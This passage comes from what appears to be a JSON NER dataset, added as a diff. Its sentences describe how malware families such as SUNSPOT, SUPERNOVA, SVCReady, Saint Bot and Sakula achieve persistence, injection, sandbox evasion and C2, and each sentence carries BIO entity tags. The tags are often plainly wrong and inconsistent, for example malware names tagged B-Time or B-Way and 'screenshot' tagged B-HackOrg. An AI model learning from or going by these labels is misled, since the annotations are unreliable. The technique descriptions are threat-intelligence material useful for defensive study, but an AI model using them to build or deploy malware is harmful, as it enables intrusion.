"B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNSPOT", + "used", + "Windows", + "API", + "functions", + "such", + "as", + "<code>MoveFileEx</code>", + "and", + "<code>NtQueryInformationProcess</code>", + "as", + "part", + "of", + "the", + "SUNBURST", + "injection", + "process." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNSPOT", + "encrypted", + "log", + "entries", + "it", + "collected", + "with", + "the", + "stream", + "cipher", + "RC4", + "using", + "a", + "hard-coded", + "key.", + "It", + "also", + "uses", + "AES128-CBC", + "encrypted", + "blobs", + "for", + "SUNBURST", + "source", + "code", + "and", + "data", + "extracted", + "from", + "the", + "SolarWinds", + "Orion", + "<MsBuild.exe</code>", + "process." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "SUNSPOT", + "monitored", + "running", + "processes", + "for", + "instances", + "of", + "<code>MsBuild.exe</code>", + "by", + "hashing", + "the", + "name", + "of", + "each", + "running", + "process", + "and", + "comparing", + "it", + "to", + "the", + "corresponding", + "value", + "<code>0x53D525</code>.", + "It", + "also", + "extracted", + "command-line", + "arguments", + "and", + "individual", + "arguments", + "from", + "the", + "running", + "<code>MsBuild.exe</code>", + "process", + "to", + "identify", + "the", + "directory", + "path", + "of", + "the", + "Orion", + "software", + "Visual", + "Studio", + "solution." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUNSPOT", + "created", + "a", + "copy", + "of", + "the", + "SolarWinds", + "Orion", + "software", + "source", + "file", + "with", + "a", + "<code>.bk</code>", + "extension", + "to", + "backup", + "the", + "original", + "content,", + "wrote", + "SUNBURST", + "using", + "the", + "same", + "filename", + "but", + "with", + "a", + "<code>.tmp</code>", + "extension,", + "and", + "then", + "moved", + "SUNBURST", + "using", + "<code>MoveFileEx</code>", + "to", + "the", + "original", + "filename", + "with", + "a", + "<code>.cs</code>", + "extension", + "so", + "it", + "could", + "be", + "compiled", + "within", + "Orion", + "software." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUPERNOVA", + "contained", + "Base64-encoded", + "strings." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUPERNOVA", + "was", + "installed", + "via", + "exploitation", + "of", + "a", + "SolarWinds", + "Orion", + "API", + "authentication", + "bypass", + "vulnerability", + "(CVE-2020-10148)." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "SUPERNOVA", + "has", + "masqueraded", + "as", + "a", + "legitimate", + "SolarWinds", + "DLL." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "SUPERNOVA", + "had", + "to", + "receive", + "an", + "HTTP", + "GET", + "request", + "containing", + "a", + "specific", + "set", + "of", + "parameters", + "in", + "order", + "to", + "execute." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SUPERNOVA", + "is", + "a", + "Web", + "shell." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "has", + "created", + "the", + "`HKEY_CURRENT_USER\\Software\\Classes\\CLSID\\{E6D34FFC-AD32-4d6a-934C-D387FA873A19}`", + "Registry", + "key", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "can", + "collect", + "data", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "can", + "send", + "collected", + "data", + "in", + "JSON", + "format", + "to", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "has", + "the", + "ability", + "to", + "download", + "additional", + "tools", + "such", + "as", + "the", + "RedLine", + "Stealer", + "to", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "has", + "relied", + "on", + "users", + "clicking", + "a", + "malicious", + "attachment", + "delivered", + "through", + "spearphishing." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SVCReady", + "has", + "named", + "a", + "task", + "`RecoveryExTask`", + "as", + "part", + "of", + "its", + "persistence", + "activity." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "can", + "use", + "Windows", + "API", + "calls", + "to", + "gather", + "information", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "can", + "encrypt", + "victim", + "data", + "with", + "an", + "RC4", + "cipher." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "can", + "check", + "for", + "the", + "number", + "of", + "devices", + "plugged", + "into", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "can", + "collect", + "a", + "list", + "of", + "running", + "processes", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "can", + "search", + "for", + "the", + "`HKEY_LOCAL_MACHINE\\HARDWARE\\DESCRIPTION\\System`", + "Registry", + "key", + "to", + "gather", + "system", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "has", + "used", + "`rundll32.exe`", + "for", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-SamFile", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "can", + "create", + "a", + "scheduled", + "task", + "named", + "`RecoveryExTask`", + "to", + "gain", + "persistence." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "can", + "take", + "a", + "screenshot", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "can", + "collect", + "a", + "list", + "of", + "installed", + "software", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "has", + "been", + "distributed", + "via", + "spearphishing", + "campaigns", + "containing", + "malicious", + "Mircrosoft", + "Word", + "documents." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Org", + "B-OffAct", + "O", + "O", + "B-Way", + "I-SamFile", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "has", + "the", + "ability", + "to", + "determine", + "if", + "its", + "runtime", + "environment", + "is", + "virtualized." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "has", + "the", + "ability", + "to", + "collect", + "information", + "such", + "as", + "computer", + "name,", + "computer", + "manufacturer,", + "BIOS,", + "operating", + "system,", + "and", + "firmware,", + "including", + "through", + "the", + "use", + "of", + "`systeminfo.exe`." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "SVCReady", + "can", + "collect", + "the", + "username", + "from", + "an", + "infected", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "can", + "collect", + "time", + "zone", + "information." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "can", + "enter", + "a", + "sleep", + "stage", + "for", + "30", + "minutes", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "has", + "used", + "VBA", + "macros", + "to", + "execute", + "shellcode." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SVCReady", + "can", + "communicate", + "with", + "its", + "C2", + "servers", + "via", + "HTTP." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "SVCReady", + "can", + "use", + "`WMI`", + "queries", + "to", + "detect", + "the", + "presence", + "of", + "a", + "virtual", + "machine", + "environment." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SYNful", + "Knock", + "has", + "the", + "capability", + "to", + "add", + "its", + "own", + "custom", + "backdoor", + "password", + "when", + "it", + "modifies", + "the", + "operating", + "system", + "of", + "the", + "affected", + "network", + "device." + ], + "ner_tags": [ + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-Features", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SYNful", + "Knock", + "is", + "malware", + "that", + "is", + "inserted", + "into", + "a", + "network", + "device", + "by", + "patching", + "the", + "operating", + "system", + "image." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SYNful", + "Knock", + "can", + "be", + "sent", + "instructions", + "via", + "special", + "packets", + "to", + "change", + "its", + "functionality.", + "Code", + "for", + "new", + "functionality", + "can", + "be", + "included", + "in", + "these", + "messages." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SYSCON", + "has", + "the", + "ability", + "to", + "use", + "FTP", + "in", + "C2", + "communications." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SYSCON", + "has", + "been", + "executed", + "by", + "luring", + "victims", + "to", + "open", + "malicious", + "e-mail", + "attachments." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "SYSCON", + "has", + "the", + "ability", + "to", + "use", + "Tasklist", + "to", + "list", + "running", + "processes." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SYSCON", + "has", + "the", + "ability", + "to", + "use", + "Systeminfo", + "to", + "identify", + "system", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "I-Features", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "SYSCON", + "has", + "the", + "ability", + "to", + "execute", + "commands", + "through", + "cmd", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "written", + "its", + "payload", + "into", + "a", + "newly-created", + "`EhStorAuthn.exe`", + "process", + "using", + "`ZwWriteVirtualMemory`", + "and", + "executed", + "it", + "using", + "`NtQueueApcThread`", + "and", + "`ZwAlertResumeThread`." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "attempted", + "to", + "bypass", + "UAC", + "using", + "`fodhelper.exe`", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "can", + "collect", + "files", + "and", + "information", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "used", + "`is_debugger_present`", + "as", + "part", + "of", + "its", + "environmental", + "checks." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "can", + "deobfuscate", + "strings", + "and", + "files", + "for", + "execution." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "injected", + "its", + "DLL", + "component", + "into", + "`EhStorAurhn.exe`." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "can", + "run", + "a", + "batch", + "script", + "named", + "`del.bat`", + "to", + "remove", + "any", + "Saint", + "Bot", + "payload-linked", + "files", + "from", + "a", + "compromise", + "system", + "if", + "anti-analysis", + "or", + "locale", + "checks", + "fail." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "can", + "search", + "a", + "compromised", + "host", + "for", + "specific", + "files." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "can", + "download", + "additional", + "files", + "onto", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "B-SecTeam", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "had", + "used", + "`InstallUtil.exe`", + "to", + "download", + "and", + "deploy", + "executables." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "relied", + "upon", + "users", + "to", + "execute", + "a", + "malicious", + "attachment", + "delivered", + "via", + "spearphishing." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "relied", + "on", + "users", + "to", + "click", + "on", + "a", + "malicious", + "link", + "delivered", + "via", + "a", + "spearphishing." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "renamed", + "malicious", + "binaries", + "as", + "`wallpaper.mp4`", + "and", + "`slideshow.mp4`", + "to", + "avoid", + "detection." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "been", + "disguised", + "as", + "a", + "legitimate", + "executable,", + "including", + "as", + "Windows", + "SDK." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "used", + "different", + "API", + "calls,", + "including", + "`GetProcAddress`,", + "`VirtualAllocEx`,", + "`WriteProcessMemory`,", + "`CreateProcessA`,", + "and", + "`SetThreadContext`." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "been", + "obfuscated", + "to", + "help", + "avoid", + "detection." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "used", + "PowerShell", + "for", + "execution." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "enumerated", + "running", + "processes", + "on", + "a", + "compromised", + "host", + "to", + "determine", + "if", + "it", + "is", + "running", + "under", + "the", + "process", + "name", + "`dfrgui.exe`." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "The", + "Saint", + "Bot", + "loader", + "has", + "used", + "API", + "calls", + "to", + "spawn", + "`MSBuild.exe`", + "in", + "a", + "suspended", + "state", + "before", + "injecting", + "the", + "decrypted", + "Saint", + "Bot", + "binary", + "into", + "it." + ], + "ner_tags": [ + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "used", + "`check_registry_keys`", + "as", + "part", + "of", + "its", + "environmental", + "checks." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "established", + "persistence", + "by", + "being", + "copied", + "to", + "the", + "Startup", + "directory", + "or", + "through", + "the", + "`\\Software\\Microsoft\\Windows\\CurrentVersion\\Run`", + "registry", + "key." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "used", + "`regsvr32`", + "to", + "execute", + "scripts." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "created", + "a", + "scheduled", + "task", + "named", + "\"Maintenance\"", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "been", + "packed", + "using", + "a", + "dark", + "market", + "crypter." + ], + "ner_tags": [ + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "been", + "distributed", + "as", + "malicious", + "attachments", + "within", + "spearphishing", + "emails." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "been", + "distributed", + "through", + "malicious", + "links", + "contained", + "within", + "spearphishing", + "emails." + ], + "ner_tags": [ + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "used", + "Base64", + "to", + "encode", + "its", + "C2", + "communications." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "run", + "several", + "virtual", + "machine", + "and", + "sandbox", + "checks,", + "including", + "checking", + "if", + "`Sbiedll.dll`", + "is", + "present", + "in", + "a", + "list", + "of", + "loaded", + "modules,", + "comparing", + "the", + "machine", + "name", + "to", + "`HAL9TH`", + "and", + "the", + "user", + "name", + "to", + "`JohnDoe`,", + "and", + "checking", + "the", + "BIOS", + "version", + "for", + "known", + "virtual", + "machine", + "identifiers." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "can", + "identify", + "the", + "OS", + "version,", + "CPU,", + "and", + "other", + "details", + "from", + "a", + "victim's", + "machine." + ], + "ner_tags": [ + "B-SecTeam", + "B-Tool", + "O", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "conducted", + "system", + "locale", + "checks", + "to", + "see", + "if", + "the", + "compromised", + "host", + "is", + "in", + "Russia,", + "Ukraine,", + "Belarus,", + "Armenia,", + "Kazakhstan,", + "or", + "Moldova." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Area", + "B-Area", + "B-Area", + "B-Area", + "B-Area", + "O", + "B-Area" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "can", + "collect", + "the", + "IP", + "address", + "of", + "a", + "victim", + "machine." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "can", + "collect", + "the", + "username", + "from", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "used", + "the", + "command", + "`timeout", + "20`", + "to", + "pause", + "the", + "execution", + "of", + "its", + "initial", + "loader." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "used", + "`.vbs`", + "scripts", + "for", + "execution." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "O", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "used", + "HTTP", + "for", + "C2", + "communications." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Saint", + "Bot", + "has", + "used", + "`cmd.exe`", + "and", + "`.bat`", + "scripts", + "for", + "execution." + ], + "ner_tags": [ + "I-HackOrg", + "I-HackOrg", + "O", + "O", + "B-SamFile", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sakula", + "contains", + "UAC", + "bypass", + "code", + "for", + "both", + "32-", + "and", + "64-bit", + "systems." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sakula", + "uses", + "DLL", + "side-loading,", + "typically", + "using", + "a", + "digitally", + "signed", + "sample", + "of", + "Kaspersky", + "Anti-Virus", + "(AV)", + "6.0", + "for", + "Windows", + "Workstations", + "or", + "McAfee's", + "Outlook", + "Scan", + "About", + "Box", + "to", + "load", + "malicious", + "DLL", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Time", + "O", + "B-SecTeam", + "O", + "B-SecTeam", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sakula", + "uses", + "single-byte", + "XOR", + "obfuscation", + "to", + "obfuscate", + "many", + "of", + "its", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "Sakula", + "samples", + "use", + "cmd.exe", + "to", + "delete", + "temporary", + "files." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sakula", + "has", + "the", + "capability", + "to", + "download", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "O" + ] + }, + { + "tokens": [ + "Most", + "Sakula", + "samples", + "maintain", + "persistence", + "by", + "setting", + "the", + "Registry", + "Run", + "key", + "<code>SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\</code>", + "in", + "the", + "HKLM", + "or", + "HKCU", + "hive,", + "with", + "the", + "Registry", + "value", + "and", + "file", + "name", + "varying", + "by", + "sample." + ], + "ner_tags": [ + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sakula", + "calls", + "cmd.exe", + "to", + "run", + "various", + "DLL", + "files", + "via", + "rundll32." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Sakula", + "encodes", + "C2", + "traffic", + "with", + "single-byte", + "XOR", + "keys." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Sakula", + "uses", + "HTTP", + 